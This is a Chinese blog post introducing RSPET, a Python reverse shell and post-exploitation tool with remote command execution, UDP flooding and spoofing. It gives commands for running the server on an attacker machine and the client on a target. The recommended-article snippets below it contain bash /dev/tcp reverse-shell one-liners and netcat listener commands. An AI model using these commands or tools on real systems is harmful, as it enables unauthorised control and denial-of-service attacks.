黑客技术:基于Python的反连Shell和后渗透工具(仅供参考)

最新推荐文章于 2024-04-28 12:17:27 发布
最新推荐文章于 2024-04-28 12:17:27 发布
阅读量1.1k 收藏
点赞数
分类专栏: python

今天为大家分享一个黑客技术,小编在这里声明:本教程仅供参考,不赞成也不鼓励大家它方式入侵别人电脑和网络破坏。

RSPET (Reverse Shell and Post Exploitation Tool)

是一个基于Python的反连shell,并且具备后渗透阶段的一些功能。

实现功能

  • 远程命令执行
  • 流量加密(异或加密代替明文传输),使用443端口可以取得更好的效果【1】
  • 内置了加密传输文件或二进制数据的功能
  • 内置UDP洪泛攻击工具
  • 内置UDP欺骗攻击工具【2】
  • 管理多个或全部主机,控制多个连接的主机传输文件和UDP洪泛攻击。
  • 模块化的代码设计,易于定制【3】
  • 客户端脚本已经过测试,可以兼容Pyinstaller(可以转换成.exe)【4】

黑客技术:基于Python的反连Shell和后渗透工具(仅供参考)

更多Python视频、源码、资料加群683380553免费获取

部署

  • RSPET_server.py或RSPET_server_min.py运行在攻击机上,接收连接。
  • RSPET_client.py或RSPET_client_min.py运行在目标机上,会初始化并发送连接请求,等待输入。

执行

服务端:

python RSPET_server.py (max_connections)

max_connections如果为空,则默认为5.

控制端:

python RSPET_client.py server_ip

可以根据个人需要进行调整

Linux发行版

包含RSPET的Linux发行版列表

BlackArch Linux (2016.04.28版本中)

声明:该软件供学习研究使用或作为一个POC。开发者不赞同和鼓励或以其它方式支持非授权的电脑入侵和网络破坏。

Python 学习者
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 328
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
python成为顶级黑客-python绝技:运用python成为顶级黑客 PDF 超清中文版
weixin_39770165的博客
11-11 1252
给大家带来的一篇关于python相关的电子书资源,介绍了关于python绝技、python黑客方面的内容,本书是由电子工业出版社出版,格式为PDF,资源大小42 MB,TJO编写,目前豆瓣、亚马逊、当当、京东等电子书综合评分为:7.4。内容介绍有关Python的书尽管现有许多,但从安全性从业人员视角多方位分析Python的书藉基本上沒有,《Python绝技:运用Python成为**黑客》弥补了这一...
Python黑客编程——反弹shell
JOHNSON 抓什 的博客
05-20 953
看了上两边文章,你会了使用socket进行交互和subprocess执行系统命令,那么两者结合起来可以制作一个反弹shell,没有看过的去看一下把。 先说一下思路 首先hacker攻击方,编写脚本控制端(server)和受控端(client), 控制端(server)开启监听等待受害者(client)连接,连接成功后,就可以获得shell了 受控端(client)上有运行命令的函数,将接收到的数据作为命令运行,再将运行结果发送回控制端(server) 最后就是考验社会工程学的时候到了,打开监听诱使
Python黑客攻击的几种技术,你得了解一下
weixin_34018169的博客
04-26 2591
2019独角兽企业重金招聘Python工程师标准>>> ...
Python黑帽子 黑客与渗透测试编程之道》的学习(一)
sinat_34946888的博客
10-14 403
1.设置python环境 同时安装easy_install和pip这两个包管理工具: ~#:apt-get install python-setuptools python-pip WingIDE是比较好的集成开发环境,下载地址http://www.wingware.com/,可以保存到用户目录(/home),然后安装: ~#:dpkg -i wingide5_5.0.9-1_i386.
反向连接的SHELL
digwtx的专栏
03-29 1172
#include #pragma comment(lib,"Ws2_32.lib")int WINAPI WinMain(){    WSADATA wsaData;    SOCKET hSocket;    STARTUPINFO si;    PROCESS_INFORMATION pi;    struct sockaddr_in adik_sin;    memset(&adik_sin
python入侵个人电脑的步骤图解台式_入侵渗透专用的python小脚本脚本安全 -电脑资料...
weixin_34911749的博客
02-03 2217
渗透的很多时候,在网上找到的工具并不适用,自己写代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评,0×01记录root密码小工具:root.py01#!/usr/bin/python02importos, sys, getpass, time0304current_time=time.strftime("%Y-%m-%d %H:%M")05log...
Python安全攻防-从入门到入狱
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
反向 shell
lyyslsw的专栏
12-27 651
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
黑客零基础第一章--反向shell
ShadowBlade
08-09 4981
一篇文章叫你完全掌握反向shell
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2071
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反向shell实操
TingSty小z的博客
02-25 4772
实验一: A机器传递信息到B机器: 测试环境macOS 10.15 1、A用nc命令 listen本机一个端口号 nc -l 8000 2、B 用telnet命令 去连接A机器的ip和端口号 telnet ipA 8000 3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输 telnet的退出 ctrl+] 实验二: 反向shell,A机器控制B机器 一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B; 另一种方式:方向shell,B
JavaScript学习笔记(二十)DOM动画效果
最新发布
2401_84254011的博客
04-28 565
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
python渗透工具,基于 Python反连 Shell 和后渗透工具
weixin_32141627的博客
03-26 203
RSPET (Reverse Shell and Post Exploitation Tool) 是一个基于Python反连shell,并且具备后渗透阶段的一些功能。注意:在V0.0.3版本中添加了一个min文件夹,因为这个新版本包含了其它不影响主功能(反连shell)的其它功能min不会引入v0.0.3之后版本的任何更多功能,只接受与bug和性能相关的补丁。目前的版本:v0.0.6功能远程命令...
什么是反连
weixin_34204722的博客
04-17 196
设有两个页面A和B,B页面通过一个链接指向A页面,那么,B就是A的一个反链。一个网站的反链不仅仅包含友情链接,同时包含本网站其他页面的链接,反链>友情链接。浅显地说,如果你有自己的网站或博客空间等,在别人的网站上有你的网站地址,即是url,别人能通过这个链接点击进入你的网站等。 人生就像不能回头的旅途(网站) 广告位招商(网站) 人生就像不能回头的旅途(网店) 北京淘宝联盟(微博...
linux下反弹shell的姿势
hl1293348082的专栏
04-11 227
通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。下面就说说linux自带的程序来反弹shell的姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。 0x01 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0x02 exec /bin/bash 0&0 2>
[系统安全] 三十八.Metasploit后渗透技术信息收集、权限提权和功能模块详解
杨秀璋的专栏
01-17 5862
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。这篇文章继续带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。同时,结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有所帮助~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值